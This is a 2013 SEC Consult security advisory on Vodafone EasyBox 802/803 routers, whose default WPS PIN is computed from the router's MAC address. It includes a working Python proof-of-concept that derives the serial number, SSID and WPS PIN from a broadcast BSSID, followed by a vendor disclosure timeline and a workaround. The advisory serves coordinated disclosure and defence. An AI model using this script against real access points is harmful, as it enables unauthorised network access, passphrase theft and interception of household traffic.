SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >
=======================================================================
              title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
            product: EasyBox 802 & EasyBox 803
 vulnerable version: EasyBox 802 - all versions
                     EasyBox 803 - Production date before August 2011
      fixed version: EasyBox 802 - no vendor patch available
                     EasyBox 803 - Production date after August 2011
             impact: Critical
           homepage: http://www.vodafone.de
              found: 2012-12-01
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.


Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS-PIN is entirely based on the MAC
address (=BSSID) and serial number of the device. The serial number can be
derived from the MAC address.

An unauthenticated attacker within the range of the access point can capture
the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN
for it. This PIN can then be used to retrieve the current access point
configuration (including the WPA passphrase) or to change the configuration
(SSID, encryption method, passphrase, ...) of the access point.

An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.


Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:

#!/usr/bin/env python
import sys, re

def gen_pin (mac_str, sn):
    mac_int = [int(x, 16) for x in mac_str]
    sn_int = [0]*5+[int(x) for x in sn[5:]]
    hpin = [0] * 7

    k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
    k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
    hpin[0] = k1 ^ sn_int[9];
    hpin[1] = k1 ^ sn_int[8];
    hpin[2] = k2 ^ mac_int[9];
    hpin[3] = k2 ^ mac_int[10];
    hpin[4] = mac_int[10] ^ sn_int[9];
    hpin[5] = mac_int[11] ^ sn_int[8];
    hpin[6] = k1 ^ sn_int[7];
    pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5],
hpin[6]), 16) % 10000000

    # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
    accum = 0
    t = pin
    while (t):
        accum += 3 * (t % 10)
        t /= 10
        accum += t % 10
        t /= 10
    return '%i%i' % (pin, (10 - accum % 10) % 10)

def main():
    if len(sys.argv) != 2:
        sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')

    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')

    sn = 'R----%05i' % int(mac_str[8:12], 16)
    print 'derived serial number:', sn
    print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8],
mac_str[9], sn[5], sn[9])
    print 'WPS pin:', gen_pin(mac_str, sn)

if __name__ == "__main__":
    main()


Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.

According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011


Vendor contact timeline:
------------------------
2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datenschutz@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted
            channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com
            and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives
            information about some newer devices which are not affected,
            mentions that customers have already been notified to change
      "default passwords" (no details given).
2013-02-21: Requesting information regarding affected products/product versions,
            clarification regarding "default passwords", URLs/communication
      channels used for mentioned notifications, ways for identifying
      vulnerable devices (end users), ...
2013-03-13: Still no response - sending deadline dates
2013-05-29: Contacting German CERT-Bund for further coordination in order to
            warn end users
2013-08-05: Coordinated release of advisory with German CERT-Bund


Solution:
---------
Vodafone does not provide a solution for the affected devices.


Workaround:
-----------
Either change the WPS PIN or disable WPS entirely.
SEC Consult could not confirm if WPS actually is disabled (as opposed to just
not being advertised), so both changing the PIN and disabling WPS is
recommended.


Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2013